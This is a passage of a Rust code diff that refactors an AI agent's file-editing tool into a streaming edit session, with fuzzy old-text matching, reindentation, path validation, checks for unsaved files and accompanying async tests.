session.compute_new_text_and_diff(cx).await; + Err(EditFileToolOutput::Error { + error, + input_path: Some(session.input_path), + diff, }) - .await; - - let input_path = input.path.display(); - if unified_diff.is_empty() { - anyhow::ensure!( - !hallucinated_old_text, - formatdoc! {" - Some edits were produced but none of them could be applied. - Read the relevant sections of {input_path} again so that - I can perform the requested edits. - "} - ); - anyhow::ensure!( - ambiguous_ranges.is_empty(), - { - let line_numbers = ambiguous_ranges - .iter() - .map(|range| range.start.to_string()) - .collect::>() - .join(", "); - formatdoc! {" - matches more than one position in the file (lines: {line_numbers}). Read the - relevant sections of {input_path} again and extend so - that I can perform the requested edits. - "} - } - ); } - - anyhow::Ok(EditFileToolOutput::Success { - input_path: input.path, - new_text, - old_text, - diff: unified_diff, - }) - }.await; - result - .map_err(|e| EditFileToolOutput::Error { error: e.to_string() }) + EditSessionResult::Failed { + error, + session: None, + } => Err(EditFileToolOutput::Error { + error, + input_path: None, + diff: String::new(), + }), + } }) } @@ -536,181 +592,1666 @@ impl AgentTool for EditFileTool { } } -/// Validate that the file path is valid, meaning: -/// -/// - For `edit` and `overwrite`, the path must point to an existing file. -/// - For `create`, the file must not already exist, but it's parent dir must exist. -fn resolve_path( - input: &EditFileToolInput, - project: Entity, - cx: &mut App, -) -> Result { - let project = project.read(cx); +pub struct EditSession { + abs_path: PathBuf, + input_path: PathBuf, + buffer: Entity, + old_text: Arc, + diff: Entity, + mode: EditFileMode, + parser: ToolEditParser, + pipeline: EditPipeline, + file_changed_since_last_read: bool, + _finalize_diff_guard: Deferred>, +} - match input.mode { - EditFileMode::Edit | EditFileMode::Overwrite => { - let path = project - .find_project_path(&input.path, cx) - .context("Can't edit file: path not found")?; +struct EditPipeline { + current_edit: Option, + content_written: bool, +} - let entry = project - .entry_for_path(&path, cx) - .context("Can't edit file: path not found")?; +enum EditPipelineEntry { + ResolvingOldText { + matcher: StreamingFuzzyMatcher, + }, + StreamingNewText { + streaming_diff: StreamingDiff, + edit_cursor: usize, + reindenter: Reindenter, + original_snapshot: text::BufferSnapshot, + }, +} - anyhow::ensure!(entry.is_file(), "Can't edit file: path is a directory"); - Ok(path) +impl EditPipeline { + fn new() -> Self { + Self { + current_edit: None, + content_written: false, } + } - EditFileMode::Create => { - if let Some(path) = project.find_project_path(&input.path, cx) { - anyhow::ensure!( - project.entry_for_path(&path, cx).is_none(), - "Can't create file: file already exists" - ); - } - - let parent_path = input - .path - .parent() - .context("Can't create file: incorrect path")?; - - let parent_project_path = project.find_project_path(&parent_path, cx); - - let parent_entry = parent_project_path - .as_ref() - .and_then(|path| project.entry_for_path(path, cx)) - .context("Can't create file: parent directory doesn't exist")?; - - anyhow::ensure!( - parent_entry.is_dir(), - "Can't create file: parent is not a directory" - ); - - let file_name = input - .path - .file_name() - .and_then(|file_name| file_name.to_str()) - .and_then(|file_name| RelPath::unix(file_name).ok()) - .context("Can't create file: invalid filename")?; - - let new_file_path = parent_project_path.map(|parent| ProjectPath { - path: parent.path.join(file_name), - ..parent + fn ensure_resolving_old_text(&mut self, buffer: &Entity, cx: &mut AsyncApp) { + if self.current_edit.is_none() { + let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.text_snapshot()); + self.current_edit = Some(EditPipelineEntry::ResolvingOldText { + matcher: StreamingFuzzyMatcher::new(snapshot), }); - - new_file_path.context("Can't create file") } } } -#[cfg(test)] -mod tests { - use super::*; - use crate::tools::tool_permissions::{SensitiveSettingsKind, sensitive_settings_kind}; - use crate::{ContextServerRegistry, Templates}; - use fs::Fs as _; - use gpui::{TestAppContext, UpdateGlobal}; - use language_model::fake_provider::FakeLanguageModel; - use prompt_store::ProjectContext; - use serde_json::json; - use settings::Settings; - use settings::SettingsStore; - use util::{path, rel_path::rel_path}; - - #[gpui::test] - async fn test_edit_nonexistent_file(cx: &mut TestAppContext) { - init_test(cx); +impl EditSession { + async fn new( + path: PathBuf, + display_description: &str, + mode: EditFileMode, + tool: &EditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result { + let project_path = cx.update(|cx| resolve_path(mode, &path, &tool.project, cx))?; + + let Some(abs_path) = cx.update(|cx| tool.project.read(cx).absolute_path(&project_path, cx)) + else { + return Err(format!( + "Worktree at '{}' does not exist", + path.to_string_lossy() + )); + }; - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({})).await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - let result = cx - .update(|cx| { - let input = EditFileToolInput { - display_description: "Some edit".into(), - path: "root/nonexistent_file.txt".into(), - mode: EditFileMode::Edit, - }; - Arc::new(EditFileTool::new( - project, - thread.downgrade(), - language_registry, - Templates::new(), - )) - .run( - ToolInput::resolved(input), - ToolCallEventStream::test().0, - cx, - ) - }) - .await; - assert_eq!( - result.unwrap_err().to_string(), - "Can't edit file: path not found" + event_stream.update_fields( + ToolCallUpdateFields::new().locations(vec![ToolCallLocation::new(abs_path.clone())]), ); - } - #[gpui::test] - async fn test_resolve_path_for_creating_file(cx: &mut TestAppContext) { - let mode = &EditFileMode::Create; + cx.update(|cx| tool.authorize(&path, &display_description, event_stream, cx)) + .await + .map_err(|e| e.to_string())?; - let result = test_resolve_path(mode, "root/new.txt", cx); - assert_resolved_path_eq(result.await, rel_path("new.txt")); + let buffer = tool + .project + .update(cx, |project, cx| project.open_buffer(project_path, cx)) + .await + .map_err(|e| e.to_string())?; - let result = test_resolve_path(mode, "new.txt", cx); - assert_resolved_path_eq(result.await, rel_path("new.txt")); + let file_changed_since_last_read = ensure_buffer_saved(&buffer, &abs_path, tool, cx)?; - let result = test_resolve_path(mode, "dir/new.txt", cx); - assert_resolved_path_eq(result.await, rel_path("dir/new.txt")); + let diff = cx.new(|cx| Diff::new(buffer.clone(), cx)); + event_stream.update_diff(diff.clone()); + let finalize_diff_guard = util::defer(Box::new({ + let diff = diff.downgrade(); + let mut cx = cx.clone(); + move || { + diff.update(&mut cx, |diff, cx| diff.finalize(cx)).ok(); + } + }) as Box); - let result = test_resolve_path(mode, "root/dir/subdir/existing.txt", cx); - assert_eq!( - result.await.unwrap_err().to_string(), - "Can't create file: file already exists" - ); + tool.action_log.update(cx, |log, cx| match mode { + EditFileMode::Write => log.buffer_created(buffer.clone(), cx), + EditFileMode::Edit => log.buffer_read(buffer.clone(), cx), + }); - let result = test_resolve_path(mode, "root/dir/nonexistent_dir/new.txt", cx); - assert_eq!( - result.await.unwrap_err().to_string(), - "Can't create file: parent directory doesn't exist" - ); - } + let old_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + let old_text = cx + .background_spawn({ + let old_snapshot = old_snapshot.clone(); + async move { Arc::new(old_snapshot.text()) } + }) + .await; - #[gpui::test] - async fn test_resolve_path_for_editing_file(cx: &mut TestAppContext) { - let mode = &EditFileMode::Edit; + Ok(Self { + abs_path, + input_path: path, + buffer, + old_text, + diff, + mode, + parser: ToolEditParser::default(), + pipeline: EditPipeline::new(), + file_changed_since_last_read, + _finalize_diff_guard: finalize_diff_guard, + }) + } - let path_with_root = "root/dir/subdir/existing.txt"; - let path_without_root = "dir/subdir/existing.txt"; - let result = test_resolve_path(mode, path_with_root, cx); - assert_resolved_path_eq(result.await, rel_path(path_without_root)); + async fn finalize( + &mut self, + input: EditFileToolInput, + tool: &EditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result<(), String> { + match input.mode { + EditFileMode::Write => { + let content = input + .content + .ok_or_else(|| "'content' field is required for write mode".to_string())?; + + let events = self.parser.finalize_content(&content); + self.process_events(&events, tool, event_stream, cx)?; + } + EditFileMode::Edit => { + let edits = input + .edits + .ok_or_else(|| "'edits' field is required for edit mode".to_string())?; + let events = self.parser.finalize_edits(&edits); + self.process_events(&events, tool, event_stream, cx)?; + + if log::log_enabled!(log::Level::Debug) { + log::debug!("Got edits:"); + for edit in &edits { + log::debug!( + " old_text: '{}', new_text: '{}'", + edit.old_text.replace('\n', "\\n"), + edit.new_text.replace('\n', "\\n") + ); + } + } + } + } + Ok(()) + } - let result = test_resolve_path(mode, path_without_root, cx); - assert_resolved_path_eq(result.await, rel_path(path_without_root)); + async fn compute_new_text_and_diff(&self, cx: &mut AsyncApp) -> (String, String) { + let new_snapshot = self.buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + let (new_text, unified_diff) = cx + .background_spawn({ + let new_snapshot = new_snapshot.clone(); + let old_text = self.old_text.clone(); + async move { + let new_text = new_snapshot.text(); + let diff = language::unified_diff(&old_text, &new_text); + (new_text, diff) + } + }) + .await; + (new_text, unified_diff) + } - let result = test_resolve_path(mode, "root/nonexistent.txt", cx); - assert_eq!( - result.await.unwrap_err().to_string(), - "Can't edit file: path not found" - ); + fn process( + &mut self, + partial: EditFileToolPartialInput, + tool: &EditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result<(), String> { + match &self.mode { + EditFileMode::Write => { + if let Some(content) = &partial.content { + let events = self.parser.push_content(content); + self.process_events(&events, tool, event_stream, cx)?; + } + } + EditFileMode::Edit => { + if let Some(edits) = partial.edits { + let events = self.parser.push_edits(&edits); + self.process_events(&events, tool, event_stream, cx)?; + } + } + } + Ok(()) + } + + fn process_events( + &mut self, + events: &[ToolEditEvent], + tool: &EditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result<(), String> { + for event in events { + match event { + ToolEditEvent::ContentChunk { chunk } => { + let (buffer_id, buffer_len) = self + .buffer + .read_with(cx, |buffer, _cx| (buffer.remote_id(), buffer.len())); + let edit_range = if self.pipeline.content_written { + buffer_len..buffer_len + } else { + 0..buffer_len + }; + + agent_edit_buffer( + &self.buffer, + [(edit_range, chunk.as_str())], + &tool.action_log, + cx, + ); + cx.update(|cx| { + tool.set_agent_location( + self.buffer.downgrade(), + text::Anchor::max_for_buffer(buffer_id), + cx, + ); + }); + self.pipeline.content_written = true; + } + + ToolEditEvent::OldTextChunk { + chunk, done: false, .. + } => { + log::debug!("old_text_chunk: done=false, chunk='{}'", chunk); + self.pipeline.ensure_resolving_old_text(&self.buffer, cx); + + if let Some(EditPipelineEntry::ResolvingOldText { matcher }) = + &mut self.pipeline.current_edit + && !chunk.is_empty() + { + if let Some(match_range) = matcher.push(chunk, None) { + let anchor_range = self.buffer.read_with(cx, |buffer, _cx| { + buffer.anchor_range_outside(match_range.clone()) + }); + self.diff + .update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); + + cx.update(|cx| { + let position = self.buffer.read(cx).anchor_before(match_range.end); + tool.set_agent_location(self.buffer.downgrade(), position, cx); + }); + } + } + } + + ToolEditEvent::OldTextChunk { + edit_index, + chunk, + done: true, + } => { + log::debug!("old_text_chunk: done=true, chunk='{}'", chunk); + + self.pipeline.ensure_resolving_old_text(&self.buffer, cx); + + let Some(EditPipelineEntry::ResolvingOldText { matcher }) = + &mut self.pipeline.current_edit + else { + continue; + }; + + if !chunk.is_empty() { + matcher.push(chunk, None); + } + let range = extract_match( + matcher.finish(), + &self.buffer, + edit_index, + self.file_changed_since_last_read, + cx, + )?; + + let anchor_range = self + .buffer + .read_with(cx, |buffer, _cx| buffer.anchor_range_outside(range.clone())); + self.diff + .update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); + + let snapshot = self.buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + + let line = snapshot.offset_to_point(range.start).row; + event_stream.update_fields( + ToolCallUpdateFields::new().locations(vec![ + ToolCallLocation::new(&self.abs_path).line(Some(line)), + ]), + ); + + let buffer_indent = snapshot.line_indent_for_row(line); + let query_indent = text::LineIndent::from_iter( + matcher + .query_lines() + .first() + .map(|s| s.as_str()) + .unwrap_or("") + .chars(), + ); + let indent_delta = compute_indent_delta(buffer_indent, query_indent); + + let old_text_in_buffer = + snapshot.text_for_range(range.clone()).collect::(); + + log::debug!( + "edit[{}] old_text matched at {}..{}: {:?}", + edit_index, + range.start, + range.end, + old_text_in_buffer, + ); + + let text_snapshot = self + .buffer + .read_with(cx, |buffer, _cx| buffer.text_snapshot()); + self.pipeline.current_edit = Some(EditPipelineEntry::StreamingNewText { + streaming_diff: StreamingDiff::new(old_text_in_buffer), + edit_cursor: range.start, + reindenter: Reindenter::new(indent_delta), + original_snapshot: text_snapshot, + }); + + cx.update(|cx| { + let position = self.buffer.read(cx).anchor_before(range.end); + tool.set_agent_location(self.buffer.downgrade(), position, cx); + }); + } + + ToolEditEvent::NewTextChunk { + chunk, done: false, .. + } => { + log::debug!("new_text_chunk: done=false, chunk='{}'", chunk); + + let Some(EditPipelineEntry::StreamingNewText { + streaming_diff, + edit_cursor, + reindenter, + original_snapshot, + .. + }) = &mut self.pipeline.current_edit + else { + continue; + }; + + let reindented = reindenter.push(chunk); + if reindented.is_empty() { + continue; + } + + let char_ops = streaming_diff.push_new(&reindented); + apply_char_operations( + &char_ops, + &self.buffer, + original_snapshot, + edit_cursor, + &tool.action_log, + cx, + ); + + let position = original_snapshot.anchor_before(*edit_cursor); + cx.update(|cx| { + tool.set_agent_location(self.buffer.downgrade(), position, cx); + }); + } + + ToolEditEvent::NewTextChunk { + chunk, done: true, .. + } => { + log::debug!("new_text_chunk: done=true, chunk='{}'", chunk); + + let Some(EditPipelineEntry::StreamingNewText { + mut streaming_diff, + mut edit_cursor, + mut reindenter, + original_snapshot, + }) = self.pipeline.current_edit.take() + else { + continue; + }; + + // Flush any remaining reindent buffer + final chunk. + let mut final_text = reindenter.push(chunk); + final_text.push_str(&reindenter.finish()); + + log::debug!("new_text_chunk: done=true, final_text='{}'", final_text); + + if !final_text.is_empty() { + let char_ops = streaming_diff.push_new(&final_text); + apply_char_operations( + &char_ops, + &self.buffer, + &original_snapshot, + &mut edit_cursor, + &tool.action_log, + cx, + ); + } + + let remaining_ops = streaming_diff.finish(); + apply_char_operations( + &remaining_ops, + &self.buffer, + &original_snapshot, + &mut edit_cursor, + &tool.action_log, + cx, + ); + + let position = original_snapshot.anchor_before(edit_cursor); + cx.update(|cx| { + tool.set_agent_location(self.buffer.downgrade(), position, cx); + }); + } + } + } + Ok(()) + } +} + +fn apply_char_operations( + ops: &[CharOperation], + buffer: &Entity, + snapshot: &text::BufferSnapshot, + edit_cursor: &mut usize, + action_log: &Entity, + cx: &mut AsyncApp, +) { + for op in ops { + match op { + CharOperation::Insert { text } => { + let anchor = snapshot.anchor_after(*edit_cursor); + agent_edit_buffer(&buffer, [(anchor..anchor, text.as_str())], action_log, cx); + } + CharOperation::Delete { bytes } => { + let delete_end = *edit_cursor + bytes; + let anchor_range = snapshot.anchor_range_inside(*edit_cursor..delete_end); + agent_edit_buffer(&buffer, [(anchor_range, "")], action_log, cx); + *edit_cursor = delete_end; + } + CharOperation::Keep { bytes } => { + *edit_cursor += bytes; + } + } + } +} + +fn extract_match( + matches: Vec>, + buffer: &Entity, + edit_index: &usize, + file_changed_since_last_read: bool, + cx: &mut AsyncApp, +) -> Result, String> { + let file_changed_since_last_read_message = if file_changed_since_last_read { + " The file has changed on disk since you last read it." + } else { + "" + }; + + match matches.len() { + 0 => Err(format!( + "Could not find matching text for edit at index {}. \ + The old_text did not match any content in the file.{} \ + Please read the file again to get the current content.", + edit_index, file_changed_since_last_read_message, + )), + 1 => Ok(matches.into_iter().next().unwrap()), + _ => { + let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + let lines = matches + .iter() + .map(|r| (snapshot.offset_to_point(r.start).row + 1).to_string()) + .collect::>() + .join(", "); + Err(format!( + "Edit {} matched multiple locations in the file at lines: {}. \ + Please provide more context in old_text to uniquely \ + identify the location.", + edit_index, lines + )) + } + } +} + +/// Edits a buffer and reports the edit to the action log in the same effect +/// cycle. This ensures the action log's subscription handler sees the version +/// already updated by `buffer_edited`, so it does not misattribute the agent's +/// edit as a user edit. +fn agent_edit_buffer( + buffer: &Entity, + edits: I, + action_log: &Entity, + cx: &mut AsyncApp, +) where + I: IntoIterator, T)>, + S: ToOffset, + T: Into>, +{ + cx.update(|cx| { + buffer.update(cx, |buffer, cx| { + buffer.edit(edits, None, cx); + }); + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); +} + +fn ensure_buffer_saved( + buffer: &Entity, + abs_path: &PathBuf, + tool: &EditFileTool, + cx: &mut AsyncApp, +) -> Result { + let last_read_mtime = tool + .action_log + .read_with(cx, |log, _| log.file_read_time(abs_path)); + let check_result = tool.thread.read_with(cx, |thread, cx| { + let current = buffer + .read(cx) + .file() + .and_then(|file| file.disk_state().mtime()); + let dirty = buffer.read(cx).is_dirty(); + let has_save = thread.has_tool(SaveFileTool::NAME); + let has_restore = thread.has_tool(RestoreFileFromDiskTool::NAME); + (current, dirty, has_save, has_restore) + }); + + let Ok((current_mtime, is_dirty, has_save_tool, has_restore_tool)) = check_result else { + return Ok(false); + }; + + if is_dirty { + let message = match (has_save_tool, has_restore_tool) { + (true, true) => { + "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ + If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ + If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." + } + (true, false) => { + "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ + If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ + If they want to discard them, ask the user to manually revert the file, then inform you when it's ok to proceed." + } + (false, true) => { + "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ + If they want to keep them, ask the user to manually save the file, then inform you when it's ok to proceed. \ + If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." + } + (false, false) => { + "This file has unsaved changes. Ask the user whether they want to keep or discard those changes, \ + then ask them to save or revert the file manually and inform you when it's ok to proceed." + } + }; + return Err(message.to_string()); + } + + if let (Some(last_read), Some(current)) = (last_read_mtime, current_mtime) + && current != last_read + { + return Ok(true); + } + + Ok(false) +} + +fn resolve_path( + mode: EditFileMode, + path: &PathBuf, + project: &Entity, + cx: &mut App, +) -> Result { + let project = project.read(cx); + + match mode { + EditFileMode::Edit => { + let path = project + .find_project_path(&path, cx) + .ok_or_else(|| "Can't edit file: path not found".to_string())?; + + let entry = project + .entry_for_path(&path, cx) + .ok_or_else(|| "Can't edit file: path not found".to_string())?; + + if entry.is_file() { + Ok(path) + } else { + Err("Can't edit file: path is a directory".to_string()) + } + } + EditFileMode::Write => { + if let Some(path) = project.find_project_path(&path, cx) + && let Some(entry) = project.entry_for_path(&path, cx) + { + if entry.is_file() { + return Ok(path); + } else { + return Err("Can't write to file: path is a directory".to_string()); + } + } + + let parent_path = path + .parent() + .ok_or_else(|| "Can't create file: incorrect path".to_string())?; + + let parent_project_path = project.find_project_path(&parent_path, cx); + + let parent_entry = parent_project_path + .as_ref() + .and_then(|path| project.entry_for_path(path, cx)) + .ok_or_else(|| "Can't create file: parent directory doesn't exist")?; + + if !parent_entry.is_dir() { + return Err("Can't create file: parent is not a directory".to_string()); + } + + let file_name = path + .file_name() + .and_then(|file_name| file_name.to_str()) + .and_then(|file_name| RelPath::unix(file_name).ok()) + .ok_or_else(|| "Can't create file: invalid filename".to_string())?; + + let new_file_path = parent_project_path.map(|parent| ProjectPath { + path: parent.path.join(file_name), + ..parent + }); + + new_file_path.ok_or_else(|| "Can't create file".to_string()) + } + } +} + +#[cfg(test)] +mod tests { + use super::*; + use crate::{ContextServerRegistry, Templates, ToolInputSender}; + use fs::Fs as _; + use futures::StreamExt as _; + use gpui::{TestAppContext, UpdateGlobal}; + use language_model::fake_provider::FakeLanguageModel; + use prompt_store::ProjectContext; + use serde_json::json; + use settings::Settings; + use settings::SettingsStore; + use util::path; + use util::rel_path::rel_path; + + #[gpui::test] + async fn test_streaming_edit_create_file(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Create new file".into(), + path: "root/dir/new_file.txt".into(), + mode: EditFileMode::Write, + content: Some("Hello, World!".into()), + edits: None, + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let EditFileToolOutput::Success { new_text, diff, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "Hello, World!"); + assert!(!diff.is_empty()); + } + + #[gpui::test] + async fn test_streaming_edit_overwrite_file(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "old content"})).await; + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Overwrite file".into(), + path: "root/file.txt".into(), + mode: EditFileMode::Write, + content: Some("new content".into()), + edits: None, + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let EditFileToolOutput::Success { + new_text, old_text, .. + } = result.unwrap() + else { + panic!("expected success"); + }; + assert_eq!(new_text, "new content"); + assert_eq!(*old_text, "old content"); + } + + #[gpui::test] + async fn test_streaming_edit_granular_edits(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Edit lines".into(), + path: "root/file.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "line 2".into(), + new_text: "modified line 2".into(), + }]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "line 1\nmodified line 2\nline 3\n"); + } - let result = test_resolve_path(mode, "root/dir", cx); + #[gpui::test] + async fn test_streaming_edit_multiple_edits(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), + ) + .await; + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Edit multiple lines".into(), + path: "root/file.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![ + Edit { + old_text: "line 5".into(), + new_text: "modified line 5".into(), + }, + Edit { + old_text: "line 1".into(), + new_text: "modified line 1".into(), + }, + ]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; assert_eq!( - result.await.unwrap_err().to_string(), + new_text, + "modified line 1\nline 2\nline 3\nline 4\nmodified line 5\n" + ); + } + + #[gpui::test] + async fn test_streaming_edit_adjacent_edits(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), + ) + .await; + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Edit adjacent lines".into(), + path: "root/file.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![ + Edit { + old_text: "line 2".into(), + new_text: "modified line 2".into(), + }, + Edit { + old_text: "line 3".into(), + new_text: "modified line 3".into(), + }, + ]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!( + new_text, + "line 1\nmodified line 2\nmodified line 3\nline 4\nline 5\n" + ); + } + + #[gpui::test] + async fn test_streaming_edit_ascending_order_edits(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), + ) + .await; + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Edit multiple lines in ascending order".into(), + path: "root/file.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![ + Edit { + old_text: "line 1".into(), + new_text: "modified line 1".into(), + }, + Edit { + old_text: "line 5".into(), + new_text: "modified line 5".into(), + }, + ]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!( + new_text, + "modified line 1\nline 2\nline 3\nline 4\nmodified line 5\n" + ); + } + + #[gpui::test] + async fn test_streaming_edit_nonexistent_file(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({})).await; + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Some edit".into(), + path: "root/nonexistent_file.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "foo".into(), + new_text: "bar".into(), + }]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let EditFileToolOutput::Error { + error, + diff, + input_path, + } = result.unwrap_err() + else { + panic!("expected error"); + }; + assert_eq!(error, "Can't edit file: path not found"); + assert!(diff.is_empty()); + assert_eq!(input_path, None); + } + + #[gpui::test] + async fn test_streaming_edit_failed_match(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world"})).await; + let result = cx + .update(|cx| { + tool.clone().run( + ToolInput::resolved(EditFileToolInput { + display_description: "Edit file".into(), + path: "root/file.txt".into(), + mode: EditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "nonexistent text that is not in the file".into(), + new_text: "replacement".into(), + }]), + }), + ToolCallEventStream::test().0, + cx, + ) + }) + .await; + + let EditFileToolOutput::Error { error, .. } = result.unwrap_err() else { + panic!("expected error"); + }; + assert!( + error.contains("Could not find matching text"), + "Expected error containing 'Could not find matching text' but got: {error}" + ); + } + + #[gpui::test] + async fn test_streaming_early_buffer_open(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Send partials simulating LLM streaming: description first, then path, then mode + sender.send_partial(json!({"display_description": "Edit lines"})); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt" + })); + cx.run_until_parked(); + + // Path is NOT yet complete because mode hasn't appeared — no buffer open yet + sender.send_partial(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit" + })); + cx.run_until_parked(); + + // Now send the final complete input + sender.send_full(json!({ + "display_description": "Edit lines", + "path": "root/file.txt", + "mode": "edit", + "edits": [{"old_text": "line 2", "new_text": "modified line 2"}] + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "line 1\nmodified line 2\nline 3\n"); + } + + #[gpui::test] + async fn test_streaming_path_completeness_heuristic(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Send partial with path but NO mode — path should NOT be treated as complete + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file" + })); + cx.run_until_parked(); + + // Now the path grows and mode appears + sender.send_partial(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write" + })); + cx.run_until_parked(); + + // Send final + sender.send_full(json!({ + "display_description": "Overwrite file", + "path": "root/file.txt", + "mode": "write", + "content": "new content" + })); + + let result = task.await; + let EditFileToolOutput::Success { new_text, .. } = result.unwrap() else { + panic!("expected success"); + }; + assert_eq!(new_text, "new content"); + } + + #[gpui::test] + async fn test_streaming_cancellation_during_partials(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "hello world"})).await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver, mut cancellation_tx) = + ToolCallEventStream::test_with_cancellation(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Send a partial + sender.send_partial(json!({"display_description": "Edit"})); + cx.run_until_parked(); + + // Cancel during streaming + ToolCallEventStream::signal_cancellation_with_sender(&mut cancellation_tx); + cx.run_until_parked(); + + // The sender is still alive so the partial loop should detect cancellation + // We need to drop the sender to also unblock recv() if the loop didn't catch it + drop(sender); + + let result = task.await; + let EditFileToolOutput::Error { error, .. } = result.unwrap_err() else { + panic!("expected error"); + }; + assert!( + error.contains("cancelled"), + "Expected cancellation error but got: {error}" + ); + } + + #[gpui::test] + async fn test_streaming_edit_with_multiple_partials(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), + ) + .await; + let (mut sender, input) = ToolInput::::test(); + let (event_stream, _receiver) = ToolCallEventStream::test(); + let task = cx.update(|cx| tool.clone().run(input, event_stream, cx)); + + // Simulate fine-grained streaming of the JSON + sender.send_partial(json!({"display_description": "Edit multiple"})); + cx.run_until_parked(); + + sender.send_partial(json!({ + "display_description": "Edit multiple lines", + "path": "root/file.txt" + })); + 